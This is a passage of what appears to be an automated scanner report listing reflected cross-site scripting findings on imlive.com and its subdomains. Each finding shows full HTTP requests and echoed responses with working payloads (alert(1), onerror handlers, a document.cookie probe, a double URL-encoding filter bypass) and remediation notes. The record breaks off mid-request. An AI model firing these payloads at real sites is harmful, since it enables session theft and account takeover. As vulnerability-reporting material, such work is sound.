<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/?6a901'-alert(1)-'19762fb72eb=1&rf=http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f&qs=6a901'-alert(1)-'19762fb72eb=1&qs=6a901'-alert(1)-'19762fb72eb=1&bd=2257131737&sr=1
...[SNIP]...

2.142. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2bef"><a>297c1fbe51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-login/?f2bef"><a>297c1fbe51b=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 22109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-login/?f2bef"><a>297c1fbe51b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.143. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-sign-up/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80602"><a>69f3ca0322b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-sign-up/?80602"><a>69f3ca0322b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:48 GMT
Connection: close
Content-Length: 41134
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-sign-up/?80602"><a>69f3ca0322b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.144. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-sign-up/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bdfe'-alert(1)-'167f160a9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:49 GMT
Connection: close
Content-Length: 41283
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1&qs=5bdfe'-alert(1)-'167f160a9b3=1&qs=5bdfe'-alert(1)-'167f160a9b3=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.145. http://imlive.com/wmaster.ashx [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /wmaster.ashx

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f was submitted in the gotopage parameter. This input was echoed as 244f6'><script>alert(1)</script>7358040fd9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f&waron=yes&promocode=YZSUSA5583 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyLRxWQc0aKAUPIcMr1z98%2F8hVk8Zl52g6XTc8ahIm5wd6Dpvk1%2Ff8Hrm5IPl4A2Xrmhuo0zzjA78ETPbWo0pNpB; path=/
Set-Cookie: ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; path=/
X-Powered-By: vsrv47
Date: Fri, 28 Jan 2011 14:04:49 GMT
Set-Cookie: BIGipServerImlive=2366899778.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 8350


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
alytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp244f6%27%3e%3cscript%3ealert%281%29%3c%2fscript%3e7358040fd9f&lr=1107816005&ud=0&pe=404.asp&qs=404;http://imlive.com:80/homepagems3.asp244f6'><script>alert(1)</script>7358040fd9f&sr=0&iy=dallas&id=44&iu=1' height='1' width='1'>
...[SNIP]...

2.146. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76f4b'-alert(1)-'bf4b062c8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?76f4b'-alert(1)-'bf4b062c8a0=1 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oqywnfmllyyd1xzaovvpmu2g; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=oqywnfmllyyd1xzaovvpmu2g; path=/; HttpOnly
Set-Cookie: spvdr=vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:36 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 21709
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=in.imlive.com&ul=/?76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&iy=dallas&id=44&iu=1&vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.147. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30418"><script>alert(1)</script>eb906244d97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?30418"><script>alert(1)</script>eb906244d97=1 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=p0jnew55vw3nxqrrsihsgjjf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=p0jnew55vw3nxqrrsihsgjjf; path=/; HttpOnly
Set-Cookie: spvdr=vd=62454ef9-3278-4fa1-be68-74c4c836f2eb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:36 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 22110
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||30418"><script>alert(1)</script>eb906244d97~1');return false;">
...[SNIP]...

2.148. http://in.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload efac5'onerror%3d'alert(1)'f4ba4def511 was submitted in the gotopage parameter. This input was echoed as efac5'onerror='alert(1)'f4ba4def511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=efac5'onerror%3d'alert(1)'f4ba4def511 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:50 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iin=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQSSTATD=NKPDBJMAFMLOCIAIEHIHPIKM; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:51 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=in.imlive.com&ul=/waccess/efac5'onerror='alert(1)'f4ba4def511/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://in.imlive.com:80/waccess/efac5'onerror='alert(1)'f4ba4def511/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.149. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://it.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e1c9"><a>8cb16e9fe00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?9e1c9"><a>8cb16e9fe00=1 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ccdifu55oarljg55lbciuw55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ccdifu55oarljg55lbciuw55; path=/; HttpOnly
Set-Cookie: spvdr=vd=c4be0621-1928-45cc-b3f3-18258a0d7a1f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:50 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:49 GMT
Connection: close
Content-Length: 18740
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||9e1c9"><a>8cb16e9fe00~1');return false;">
...[SNIP]...

2.150. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46421'-alert(1)-'4594a948ef4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?46421'-alert(1)-'4594a948ef4=1 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=idb51qqh31xv3x45cxo5dx45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=idb51qqh31xv3x45cxo5dx45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a5fa461c-09b7-4606-8bf0-57b4f45b4d27&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:51 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:51 GMT
Connection: close
Content-Length: 18915
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=it.imlive.com&ul=/?46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&iy=dallas&id=44&iu=1&vd=a5fa461c-09b7-4606-8bf0-57b4f45b4d27';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.151. http://it.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a32d9'onerror%3d'alert(1)'7223884f696 was submitted in the gotopage parameter. This input was echoed as a32d9'onerror='alert(1)'7223884f696 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=a32d9'onerror%3d'alert(1)'7223884f696 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:04 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQSRBSD=HDONOIMAGIIFDHIHJOLHJHAN; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:04 GMT
Connection: close
Content-Length: 8305
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=it.imlive.com&ul=/waccess/a32d9'onerror='alert(1)'7223884f696/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://it.imlive.com:80/waccess/a32d9'onerror='alert(1)'7223884f696/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.152. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e62'-alert(1)-'e87ff225301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d2e62'-alert(1)-'e87ff225301=1 HTTP/1.1
